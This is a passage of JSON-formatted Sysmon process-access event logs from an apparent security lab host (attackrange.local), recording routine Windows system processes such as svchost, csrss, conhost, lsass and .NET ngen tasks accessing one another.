06:59:00.991","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6854,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.991\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.991","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6855,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.991\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12B4-5F25-0000-001036870900}\r\nTargetProcessId: 4156\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.991","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12B4-5F25-0000-001036870900}","TargetProcessId":"4156","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6856,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.991\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12B4-5F25-0000-001061870900}\r\nTargetProcessId: 3828\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.991","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12B4-5F25-0000-001061870900}","TargetProcessId":"3828","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6857,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.991\r\nSourceProcessGUID: {E2A3D6B1-12B4-5F25-0000-001036870900}\r\nSourceProcessId: 4156\r\nSourceThreadId: 2180\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-12B4-5F25-0000-0010BF860900}\r\nTargetProcessId: 1172\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.991","SourceProcessGUID":"{E2A3D6B1-12B4-5F25-0000-001036870900}","SourceProcessId":"4156","SourceThreadId":"2180","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-12B4-5F25-0000-0010BF860900}","TargetProcessId":"1172","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6858,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:00.991\r\nSourceProcessGUID: {E2A3D6B1-12B4-5F25-0000-001061870900}\r\nSourceProcessId: 3828\r\nSourceThreadId: 4732\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-12B4-5F25-0000-001031860900}\r\nTargetProcessId: 4080\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\NGenTask.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:00.991","SourceProcessGUID":"{E2A3D6B1-12B4-5F25-0000-001061870900}","SourceProcessId":"3828","SourceThreadId":"4732","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-12B4-5F25-0000-001031860900}","TargetProcessId":"4080","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\NGenTask.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6859,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:01.053\r\nSourceProcessGUID: {E2A3D6B1-12B4-5F25-0000-0010BF860900}\r\nSourceProcessId: 1172\r\nSourceThreadId: 3044\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe\r\nTargetProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010148B0900}\r\nTargetProcessId: 1008\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.dll+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.DLL+32979|UNKNOWN(00007FFF44575147)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:01.053","SourceProcessGUID":"{E2A3D6B1-12B4-5F25-0000-0010BF860900}","SourceProcessId":"1172","SourceThreadId":"3044","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe","TargetProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010148B0900}","TargetProcessId":"1008","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.dll+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.DLL+32979|UNKNOWN(00007FFF44575147)","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6860,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:01.053\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010148B0900}\r\nTargetProcessId: 1008\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:01.053","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010148B0900}","TargetProcessId":"1008","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6861,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:01.053\r\nSourceProcessGUID: {E2A3D6B1-12B4-5F25-0000-001036870900}\r\nSourceProcessId: 4156\r\nSourceThreadId: 2180\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010148B0900}\r\nTargetProcessId: 1008\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:01.053","SourceProcessGUID":"{E2A3D6B1-12B4-5F25-0000-001036870900}","SourceProcessId":"4156","SourceThreadId":"2180","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010148B0900}","TargetProcessId":"1008","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6862,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:01.069\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010148B0900}\r\nTargetProcessId: 1008\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:01.069","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010148B0900}","TargetProcessId":"1008","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6863,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:01.069\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010148B0900}\r\nTargetProcessId: 1008\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:01.069","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010148B0900}","TargetProcessId":"1008","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
